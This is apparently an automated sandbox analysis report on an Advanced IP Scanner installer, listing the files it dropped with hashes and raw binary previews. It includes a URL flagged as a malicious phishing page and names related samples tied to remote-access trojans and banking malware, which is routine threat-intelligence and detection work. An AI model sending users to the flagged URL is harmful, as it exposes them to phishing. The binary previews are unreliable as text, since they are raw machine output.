	https://flaviarc.com/sphp%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20/index.php	Get hash	malicious	HTMLPhisher	Browse	1.1.1.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)	https://download.advanced-ip-scanner.com/download/files/Advanced_IP_Scanner_2.5.4594.1.exe	Get hash	malicious	Unknown	Browse
	Advanced Scanner.exe	Get hash	malicious	NetSupport RAT, NetSupport Downloader	Browse
	ip_scan_en_us_Release_2.5.4594.1.msi	Get hash	malicious	CobaltStrike	Browse
	ipscan.msi	Get hash	malicious	Darkgate	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	Advanced_IP_Scanner.exe	Get hash	malicious	DanaBot	Browse
	IPAVSCAN_win_version_1.1.3.msi	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse
	Advanced_IP_Scanner_2.5.4594.1_net.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\Advanced IP Scanner\Advanced_IP_Scanner.ico (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	MS Windows icon resource - 9 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:	dropped
Size (bytes):	25214
Entropy (8bit):	5.181706176676903
Encrypted:	false
SSDEEP:	192:gZwwfjXDaFoDU90fQNBYNK30CCl77nQ6jtCuZEaaX/bv+NZmQDtLQIRLdc8ZDeO4:qLXDTQCQNmNa0CCl77nQ6viv6t2tMA
MD5:	3511FCBA762713FBC4D83979F300A383
SHA1:	61C33483A70C253FF38222021AD05E599F11E05C
SHA-256:	AD6B11E0F7B0E9DDD0B3440AA0C9308F18E385C7EBB78452A964F77A104B789E
SHA-512:	2CA49AE53A97FDD8AA857DFFFF281501506BAC8BD6B0D76B94CDA65592492A7DAA29FEC2CFD912DDBDCDEDEFF104BD21B00B2DED958C8BA7567536AFABE4D639
Malicious:	false
Reputation:	low
Preview:	..............(...............h....... ..........&... ..............00......h.......00.................... .h....'.. .... ......,..00.... ..%...<..(....... ...............................................................................................0...33..;...;.....ffo..6...3...o...`...o...`...o...`...o...`...o...o.......ww...ffn......n.......n.......fffg.................................................................................(....... ...........@.......................B...!{..cs..{{{.sss.{sk..s...Z...c..{ss.1...9......................9...s....R..............)...!{...1..{....9.................B....B................{..!........J.........{)...s..........k...........{c..B.................!..)...B...9.....................{...c...R...!......1...1.......................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Core.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5987880
Entropy (8bit):	6.645849589307296
Encrypted:	false
SSDEEP:	98304:I9HgaLmICbZhV8cBfAVG4F40zkpEJsv6tWKFdu9CcDo+fN4A:I9Hgaq5b7OcBfAVG4FiEJsv6tWKFdu9V
MD5:	C2BB94B2C229ECE69D865B1898C71324
SHA1:	AFAC1A2FEDE68AD129BB48B01ED8B80997F75D2F
SHA-256:	193814D47E0B7917C3373011F64CD3AC649A16D1D0515C9D409FA1794C5BFFB1
SHA-512:	2CB31EB8FD866510268553B77D2BB4DDFFB4D48F22C35B8679933CB48AC7B90DE1AEFCF6132DBCEF007F6F622869C931BE13A5D41234E49E0C7DB3F8C5CF8B0A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: Advanced Scanner.exe, Detection: malicious, Browse Filename: ip_scan_en_us_Release_2.5.4594.1.msi, Detection: malicious, Browse Filename: ipscan.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner.exe, Detection: malicious, Browse Filename: IPAVSCAN_win_version_1.1.3.msi, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse Filename: Advanced_IP_Scanner_2.5.4594.1_net.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.............s...s...s......s.\S....s..w...s..p...s..v...s..r...s..w...s..u...s..r...s...r...s...w...s...v...s...s...s.......s.......s...q...s.Rich..s.................PE..L.....%^...........!......7...$.....\|m5.......7....g..........................[.......[...@..........................eS.....\|zY.\|....0Z..............B[.(....@Z.8.....P.T.....................P.......P.@.............7..............................text.....7.......7................. ..`.rdata..4.!...7...!...7.............@..@.data...L.....Y..2....Y.............@....rsrc........0Z.......Y.............@..@.reloc..8....@Z.......Y.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Gui.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6708264
Entropy (8bit):	6.661851136227646
Encrypted:	false
SSDEEP:	98304:YMm4f0AN5rHUQ+P2DkVNYVBcE7hxc5Rar3v:Yb4fzN5rHUj+D5VBckhkRGv
MD5:	1FBE59E9BE0F445BB14BE02C0EE69D6F
SHA1:	98F62A873CA78E9BE7760DE0FDDEDC56FAE2505D
SHA-256:	F201494B5EBE609FF2CA7D36275B19AB645C81153417B5FF4852AD8E164E144D
SHA-512:	00A61EB5B7B412CFF8BB92157DD2330FC7729C23E82A6C9648C067581DDF91E0743EC5CF4B3D4D59EA49C7EDCDA63DBF39350A173A354EC465E3F5A5D087F24F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........#..B}..B}..B}..:.B}.+..B}../y..B}../~..B}../x..B}../\|..B}.\|/\|..B}..*\|..B}..B\|.#G}.\|/y..B}.\|/x..C}.\|/}..B}.\|/...B}..B.B}.\|/...B}.Rich.B}.........................PE..L.....%^...........!......E...".......E......0E..............................`g.......f...@.........................P.J..`..,Gb.@.....d..............@f.(.....d.\....rJ.T....................sJ......sJ.@............0E.4............................text...O.E.......E................. ..`.rdata..,....0E.......E.............@..@.data....A...0c..\....c.............@....rsrc.........d......xc.............@..@.reloc..\.....d......~c.............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Network.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1151016
Entropy (8bit):	6.482547207070433
Encrypted:	false
SSDEEP:	24576:Ql4zuvU31UisunBgeZaGKYbmYccwy9v5nOUhqJEe:Ql4q8lUd2z3mYVBb8H
MD5:	ED04DAB88E70661E4980A284B0DF6A0C
SHA1:	C1499360A68FDC12013A6CBB35C05A3098E95F41
SHA-256:	9AFF2CCBD77806D7828CE99481104515FA34859499C0A17FFE4785DE44E0A2F9
SHA-512:	E2B41A7A80216ECC9ADDE467E9DA84C39A4C593C0D3928442C0AC079F8D854A3605DF9E93A1408C0042F5C4D2A41CBBA281BBBB3524F5BE8F4E5DAFEA048E87A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)>..Gm..Gm..Gm...m..Gm..Fl..Gm..Bl..Gm..Cl..Gm..Dl..GmO.Fl..Gm.Fl..Gm..Fm..GmO.Bl..GmO.Gl..GmO..m..Gm...m..GmO.El..GmRich..Gm........................PE..L.....%^...........!.....0...v.......4.......@.....d......................................@.............................d$..t........................t..(...........@...T...................<...........@............@..\............................text............0.................. ..`.rdata...N...@...P...4..............@..@.data...4I..........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5PrintSupport.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	327208
Entropy (8bit):	6.804582730583226
Encrypted:	false
SSDEEP:	6144:zqg47yYJkKxQ8WVauJIg9FzQGRPvhUhcD3I95HIbPSRyuoboXHcJ2ZWa3Imr1y6a:LgTxQ3UuJIg9FzQGRPvlf
MD5:	72B2E7A9AF236E5CA0C27107E8C5690C
SHA1:	6AC273911118C7CAA71818C55E22D27B4C36B843
SHA-256:	725DD45CF413D669D22FD38BAFFB5296BD2FEC4C0379A1FA3ABA4CC12C41768A
SHA-512:	C4D217EB21501E1A26AFA5A6CB5B53152F6330A96A58B83709BE2C615594E1D640DD65E5353AD8CD2E7E3B4EABBB8E3AFF0F5D13D5577A1CCC05B590CC9803B6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........k...8...8...8.*8...8..9...8..9...8..9...8..9...8...9...8...9...8...8..8...9...8...9...8..F8...8...8...8...9...8Rich...8................PE..L...t.%^...........!.....z...j......T.....................................................@..........................}...k..............................(........7...a..T....................b.......a..@............................................text....x.......z.................. ..`.rdata...............~..............@..@.data...............................@....rsrc...............................@..@.reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Widgets.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5735464
Entropy (8bit):	6.639119541918398
Encrypted:	false
SSDEEP:	49152:hQQeqQ4ZHCscH74ar0+qrlOjvuzu7mA4a59KEyhRO6LyUfqcVeaXafSKHZV+gZtK:hzeqxHCTf4+qwGLW9sRO6XW+I9ipjN
MD5:	41C0478595550900E33B52B8CDBEDEAA
SHA1:	0550C6434EF71260D3581CE2A90F080DE93E01D6
SHA-256:	44E495DE09B59E66FDF0C1C65A2070A4CE95BAAF4169C875DEA0590BD37342BD
SHA-512:	9302EDB0DE46E0F132271532140F19D1C3B9DCE0D1F11046148E6DC81C689A07256928839FF0D64708A718004E1F216BE0F64C5C9B05CC1C612B6E0E71CC442D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Q...}...}...}.......}.......}.......}.......}.......}.......}..N....}...}..cp......}.......}....y..}...}...}.......}..Rich.}..........................PE..L.....%^...........!.....H>..J.......J>......`>....e..........................W.....h.X...@..........................ZI.D...T.Q......0T..............hW.(....@T.....prH.T...................lsH......rH.@............`>.l5...........................text....F>......H>................. ..`.rdata...2...`>..4...L>.............@..@.data........S..Z....S.............@....rsrc........0T.......S.............@..@.reloc.......@T.......S.............@..B................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5WinExtras.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	498216
Entropy (8bit):	6.392626000362742
Encrypted:	false
SSDEEP:	6144:lOssvQ+soy9eQdVgSTZuyvDTSVHyZ1Hy6:lsYvo4eQdKzW
MD5:	C80BA989BA52F73AD4332EA7B3BE0499
SHA1:	F4A2A70F2E23DB44AEC358F3DD282E68483AC631
SHA-256:	C86C36B20B602D6A063575136ECB417EB0A7AD8DDDBB966750FA348FEB74D309
SHA-512:	255862D9678F5380581F9C728327C3EA83D724A163ED35FA18BE22C35415E0E2819B8A4D2EACC0D94E53C5C3AB3D62AA2E978EF7C4F281C173C1C0A050A8EB5C
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.!...O...O...O.......O...N...O...J...O...K...O...L...O.X.K...O.X.N...O...N...O...N...O...J...O...O...O......O.......O...M...O.Rich..O.........PE..L.....&^...........!.....Z...`.......\.......p............................................@..........................{...8..\........0...............~..(....@..,....p..T....................q.......p..@............p...............................text...,X.......Z.................. ..`.rdata...j...p...l...^..............@..@.data....B..........................@....rsrc........0......................@..@.reloc..,....@......................@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\Qt5Xml.dll (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	228904
Entropy (8bit):	6.499413249756033
Encrypted:	false
SSDEEP:	3072:5vv6tCZo5oOM7fpXiUpuF007hkeWPp4bjUAIt1zG0jvbkEV3:56tb5NM7fpXiUkFdNqB4Gt1zG0h3
MD5:	0B4816D5308825B9C24FAA83CE4CB1F0
SHA1:	0EEFEF3564356B50D5B360DC4B8D8D316C99B210
SHA-256:	F10815CB6F99FA795B69FB547BA4376A336F46BC1FA279B486A24AD96FD74525
SHA-512:	806B6B203D73D08E127365C87A9AF98811E1C93568F66DFBFAE41EE13C97AC3FE623D42BC1A1FFFE36669B14E0F4E39499EC177ECA39B7339F57E50C97B20B2B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>..._.,._.,._.,.'],._.,.2.-._.,.7.-._.,.2.-._.,.2.-._.,.2.-._.,Q2.-._.,._.,\_.,Q2.-._.,Q2.-._.,Q21,._.,._Y,._.,Q2.-._.,Rich._.,................PE..L.....%^...........!..............................a................................?\....@.............................T\..4)..x....`...............b..(....p..."..0...T...............................@............................................text............................... ..`.rdata..............................@..@.data........P.......2..............@....rsrc........`.......8..............@..@.reloc..."...p...$...>..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1681960
Entropy (8bit):	6.535592110075899
Encrypted:	false
SSDEEP:	49152:N7MNjXLsvFfAhpjccQ1hhTlPrLFhNG2y+L+aJwDcN:0jXL2mboRRhrL42yE
MD5:	B3411927CC7CD05E02BA64B2A789BBDE
SHA1:	B26CFDE4CA74D5D5377889BBA5B60B5FC72DDA75
SHA-256:	4B036CC9930BB42454172F888B8FDE1087797FC0C9D31AB546748BD2496BD3E5
SHA-512:	732C750FA31D31BF4C5143938096FEB37DF5E18751398BABD05C01D0B4E5350238B0DE02D0CDFD5BA6D1B942CB305BE091AAC9FE0AAD9FC7BA7E54A4DBC708FD
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...................................@...........!..L.!This program cannot be run in DOS mode....$........lj..............u........j......x.......x.......d.......f.......x.......x.......f.......c.......c.......f..............'x......'x..`...'x..............'x......Rich............................PE..L....gb..........".................U.............@..........................P............@..................................3.......... p..............(....p..0....R..T....................S.......R..@...............d*...........................text.............................. ..`.rdata..b...........................@..@.data........0...4..................@....rsrc... p.......r...H..............@..@.reloc..0....p......................@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_ar_sa.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26334
Entropy (8bit):	5.237840743757654
Encrypted:	false
SSDEEP:	384:sIX3LNpZy4imY2tBA01s0iMJ/vZYM2jeFxikFq2pkMPcK8LM+OEM4q78nkL9BHDS:TX3xpZy4BaMJ/vZJ2jeFxieN8LMkpk6
MD5:	6AB50593778FB5BD5D5422BDD90595E6
SHA1:	282946268660F41A7484BF19C30B7B958F6A82D4
SHA-256:	132676D1F5044AE5249B764B0CD4B67993932D121FBDDC13DB2AE75961562F0F
SHA-512:	359B8EE830E74575BDB7519F98180DD3440BBBE03DE9247F2FCF6A3EFD721DD1F56DB96DBF0D47E847EA6B6365BD5AD97DF6D5B277F5926622918FF05578DB37
Malicious:	false
Preview:	<.d....!..`...B..........R....;...J...;...c...;.......;.......;..>....O..U....[..Q....^..+....^..M...(5...y..G.......H,..J...K...:...N:......V...?..._...V.......%.......K....y..Ki......................R....t..'....t..K....t..UK.....<....j......5t......@...=...H5..S...f...+.......@........;...........~...l...`..2....e..T.......T.......... =...A...y......y......%..!...0..!..+.....+.+.......+....Z.+....$.+....#..G.......G....'].H0...U%.Hw9.....Hw9.....I....%^.J6......J6......J6......J6...D).LD....d.L.b..Ur.M.S..<j.R.....0.V....+..Wi...Tr.W.T...m.Z.\|..L..[f3..P..gc......w0K..B...H...".......VF...T...a..."..0L...~..2p.. d..@....T..*W..2...........S.......Y..9.E..;Z.L.#..\..M$o.....e.....".l8...2....^..D^..I....>......=.......MY......S...>......>...:..3..+e..l...E.......5..5.l..X..AV...%'.y....Q....0..N.......M.......SA..tb..1.......................Nk......8.......I..(....M..1V...&(.R....-..W.<..Y}.f.~...f....../...1........^..1k...5..............c..A@.;6...[..q.J..JL..I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_bg_bg.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28561
Entropy (8bit):	5.2596092915719215
Encrypted:	false
SSDEEP:	768:O4suMMyQmmoRKIKfAoMzI4VxECTwTPJBLCsDbn:tsuMMypm/M04MCYTL/n
MD5:	1D2AAC0633801D7DEF387CF78A968BFF
SHA1:	D4721BBF3AA690683DCD75B690080A9785BF81B5
SHA-256:	8FDF83BEB8D7E9D3CD0B77DDC636A77A1E4FF591ED10851229ED49BDC78644DF
SHA-512:	956759A441647A00FCEA9AA4BE7DBA4463DDC6DA2EBBBFDF697BAED99CEF55B924D72F92E3443251C5C64927FF37DE345F95C366920ADFE829823105C3EB0673
Malicious:	false
Preview:	<.d....!..`...B..........[H...;...D...;.......;.......;..!....;..Ef...O..^,...[..Y....^..0....^..U...(5...m..G.......H,..R...K...A...N:......V...F..._..._`......).......R....y..S........7..............[ ...t..+O...t..S....t..]......B....j......5t...y..@...D}..H5..[...f...1!......Gn.......a...........~..4....`..9....e..]E......]k......... =...H...y...f..y...u..%..%F..0..%o.+.......+.......+......+......+....'..G.... ..G....+..H0...]..Hw9.....Hw9.....I....)@.J6......J6......J6......J6...K#.LD......L.b..^..M.S..C..R.......V....1O.Wi...\..W.T.....Z.\|..Tm.[f3..Xd.gc......w0K..I...H...&-......^....T......."..6....~..8... d..G....T../W..2...........\L......b..9.E..B..L.#..e_.M$o...\.e.......l8...83...^..K`..I....J......D.......U_......\...>......>...z..3..0...l...L.......;..5.l..a..AV...(..y....ZW...0..V8......U.......[...tb..7.......................V.......?4......Q..(....U..1V...*&.R....2..W.<..b..f.~..".......5...1....g...^..7....5...[..........c..H@.;6...c..q.J..Q...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_console.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	389160
Entropy (8bit):	6.42467668414915
Encrypted:	false
SSDEEP:	6144:KsFG7TN7RchK49w1j0GqH8HQQG16lNWjL2D7hn1WMrNayAAXe0jvYE:LgTN7RWK+PH2llNWGXRay7e0b1
MD5:	12BF5F988FF62C112FAC061D9EC97C47
SHA1:	C4E01DE097C1564872F889C5BBBD8D0559EDAE73
SHA-256:	BE2B45B7DF8E7DEA6FB6E72D776F41C50686C2C9CFBAF4D456BCC268F10AB083
SHA-512:	4B389005D647BC2108303C6E78F648D768D3F75ED84F694E75B54B95166E1569D1650508375514CB0FA0FB2F5DFC49CBD4DE1D6FA376FBA8619645EE2BC08104
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......6 .yrA.rA.rA.{9w\|A.f.+sA.U..sA.* 4.+RA.* 4.+~A.* 4.+vA..(.+pA. 4.+vA.f.+sA.f.+nA../.+wA.rA..C..4.+sA..4.+#A..4.sA.rAssA..4.+sA.RichrA.................PE..L...U.gb.........."..........R....../X............@..........................P.......[....@.........................................p..@p..............(.......$X......T...............................@............................................text............................... ..`.rdata...$.......&..................@..@.data...._..........................@....rsrc...@p...p...r..................@..@.reloc..$X.......Z...z..............@..B........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_cs_cz.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28199
Entropy (8bit):	4.76848600543852
Encrypted:	false
SSDEEP:	384:7zGw8sjK6qVziPNAsFApjRkBmPNsGYR8XQrjxpi5Qg7C/XoVsLf7ra3sEYUq:3Gw8B6qVePNAPjuYPNHAnxW7qoVsLff
MD5:	7C52599AA9F2C07DCC95378CA4BECD86
SHA1:	73831CA352BED5C6764BCB544301396C55706E6D
SHA-256:	B495F4FF61EBB88402BCD068BFD3C7EAD171CABE68C9312280F1EBAA32CCEB6F
SHA-512:	340EFFF03017538F010D7FB83BE1407E255D479A41B177189220F5D1D8D4BB6E3F668473AAAB35BFD7D8FA4742FC970E061AD0F16A1E3AE5D28DB1F0958DF1EE
Malicious:	false
Preview:	<.d....!..`...B..........Z....;.......;.......;.......;..!k...;..C....O..\....[..X....^..0....^..T6..(5......G....\..H,..Q"..K...@P..N:...@..V...EA.._...].......).......QK...y..Q................x......Y....t......t..RH...t..\o.....AB...j...o..5t......@...C...H5..Z...f...01......F....................~..3....`..7....e..[.......\........:. =...G...y......y...I..%..$..*.0..%..+.....K.+.......+....z.+......+....&..G.... {.G....+=.H0...\A.Hw9...g.Hw9.....I....(..J6....V.J6......J6......J6...I..LD......L.b..\..M.S..A..R.......V....0].Wi...[..W.T.....Z.\|..S..[f3..V..gc....L.w0K..HD..H...%.......]x...T......."..5....~..7... d..F....T......2....%......[.......aW.9.E..@..L.#..c..M$o.....e.......l8...6....^..I...I....f......CH......S.......Z...>...)..>......3../...l...KL......:>.5.l..`E.AV...(m.y....X....0..T.......S.......Zc..tb..5.......................U/......=.......O..(....T\.1V...)..R....1..W.<..`..f.~..">......4...1....+...^..6%...5..............c..F..;6...bk.q.J..P...I....!..I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_da_dk.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	26959
Entropy (8bit):	4.713288631353564
Encrypted:	false
SSDEEP:	384:ihIXQdwIyWqLSTgN1YYgX+9S1Dk+nK+sF7SVLHElRh:3XQdwIUCgN1YYgE2k1A4
MD5:	AE4754AC60C32B9D44B47CAA489E5337
SHA1:	6C3AEC0A9EF0945C06562D0ACD0E0558E18992AD
SHA-256:	D09D333B00D073C09837F669D7A8DDD77D50B2D94A177E58CE556AF83700371A
SHA-512:	74710A20298F162D6BE02F7BCBB964E447345D219887216366A7DCD283267A708666E974195F279E384526E324E27F0FBD713411E6BA58DE266069143575C6DC
Malicious:	false
Preview:	<.d....!..`...B..........U....;.......;.......;.......;.. A...;..@....O..XZ...[..TL...^...1...^..P:..(5......G....6..H,..MT..K...=@..N:...,..V...B#.._...Yn......'.......M....y..M.......................U~...t..)I...t..NV...t..X......>....j...[..5t...-..@...?...H5..V?..f....W......B........u.......Y...~..1....`..5....e..W.......W........:. =...C...y...B..y...E..%..#...0..#..+.......+.......+......+......+....%q.G.....g.G....)..H0...W..Hw9...g.Hw9.....I....'T.J6......J6....@.J6......J6...Fo.LD......L.b..X2.M.S..>..R.....\.V.....{.Wi...W4.W.T.....Z.\|..O..[f3..R..gc....~.w0K..E...H...$w......X....T......."..2....~..4... d..Cc...T..,...2...........V.......\..9.E..=..L.#.._!.M$o.....e.......l8...4c...^..F...I....L......@"......O.......Vg..>......>...n..3..-...l...H*......7..5.l..[..AV...'..y....T....0..P.......O.......V...tb..3z.......s.......y......Q.......:.......L..(....Pf.1V...($.R....0).W.<..\).f.~..!.......2r..1........^..3....5..............c..C..;6...]..q.J..L...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_de_de.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	28739
Entropy (8bit):	4.641812949957873
Encrypted:	false
SSDEEP:	384:fCwKr9wd6dllAddv/+l8hPMaupXxkMwWEXkw7NLgADR1w:fsrzdllA7H+l8hEOMwWWvA
MD5:	65A1638D5074FA60210BB5B67A4E3DB3
SHA1:	4A6B5C87D49F665BCECD0248ED0FB3BBCDF07682
SHA-256:	23B63D04EEFAE8E50FFC6963C1E45511C7D034D54F94B17C9B1B53F899BFB340
SHA-512:	D6A224A13C9E301DA124D660FD30B7FBBC8BADBA6484D39D1FDAC5410D44C48A963EA1182237FD72AD77609898C8F713CB22DCD7E20EA037BFAE6B8E25DB25C3
Malicious:	false
Preview:	<.d....!..`...B..........\....;...^...;.......;..!....;.."....;..E....O..^....[..Z....^..1....^..VL..(5......G.......H,..SB..K...B...N:.. ...V...G..._...`..............Sm...y..S........S.......Z......[....t..,O...t..TL...t..^y.....B....j.. ...5t......@...D...H5..\...f...1.......G....................~..4....`..9D...e..].......^.......... =...H...y...j..y......%..&V..0..&..+.......+.....v.+......+......+....().G....!..G....,..H0...^I.Hw9...Y.Hw9.....I....>.J6....$.J6......J6......J6...Ke.LD......L.b..^..M.S..CN.R.....\|.V....1..Wi...]..W.T.....Z.\|..U..[f3..X..gc......w0K..I...H...'5......_....T......."..6z...~..8... d..H9...T..0'..2....]......].......cm.9.E..Bj.L.#..f..M$o.....e.....\|.l8...8[...^..K...I....h......D.......V.......\...>...u..>......3..1S..l...MH......;..5.l..b..AV...)..y....Z....0..V.......U.......\_..tb..7>...............=......W%......?\|......Q..(....Vr.1V...+..R....3..W.<..b..f.~..#.......6...1....-...^..7....5...1..........c..H..;6...d..q.J..R...I.......I

C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner_el_gr.qm (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-I11J0.tmp\Advanced_IP_Scanner_2.5.4594.12.tmp
File Type:	Qt Translation file
Category:	dropped
Size (bytes):	29651
Entropy (8bit):	5.330350785151233
Encrypted:	false
SSDEEP:	768:ct97WPG5jbwTDnrXEPbfsDabKB2DsGM+04nMngRQpf5bLmdwmtPKP:8RWPU8nr0PY2hsGXnqxO3No
MD5:	E1A891010B901FE6055532E588E20293
SHA1:	167F62B548D6628FC1B989F6FD232BD362B59C23
SHA-256:	B20FC1BFC15F157CBDF4C04E8ABF7058FBE4549BFD92A7415A424D8BB5B8BF35
SHA-512:	AF0B8A085724DA971FF23228FAC2B04A5BF788FC3CFAD3481EF6E24A71E52348809A5E76BE287D68651F877F2A22391DE474140E8063DC1454678719B98E46F4
Malicious:	false
Preview:	<.d....!..`...B..........^....;.......;...e...;..!....;..#....;..H....O..a....[..]D...^..3....^..X...(5...A..G....F..H,..U...K...D...N:..!V..V...I..._...c,......,"......U....y..Ve......................^....t.......t..V....t..ag.....E....j..!...5t...K..@...G...H5.._q..f...3.......J................y...~..6....`..;....e..`.......`.......... =...K...y...,..y......%..'...0..'..+.......+.......+......+....V.+....)..G...."..G.....m.H0...a).Hw9.....Hw9.....I....+..J6......J6....r.J6......J6...NQ.LD....J.L.b..a..M.S..F,.R.......V....3..Wi...`r.W.T...q.Z.\|..W..[f3..[..gc......w0K..L...H...(.......b....T...q..."..8....~..;... d..J....T..1...2..........._.......f..9.E..E0.L.#..i..M$o.....e.......l8...:....^..N...I....f......G.......X......._...>......>...N..3..3#..l...P.......>..5.l..e..AV...+c.y....]....0..Yj......X[......_/..tb..9b.......c..............Y.......B.......TZ.(....Y..1V...,..R....5..W.<..f!.f.~..$t......8 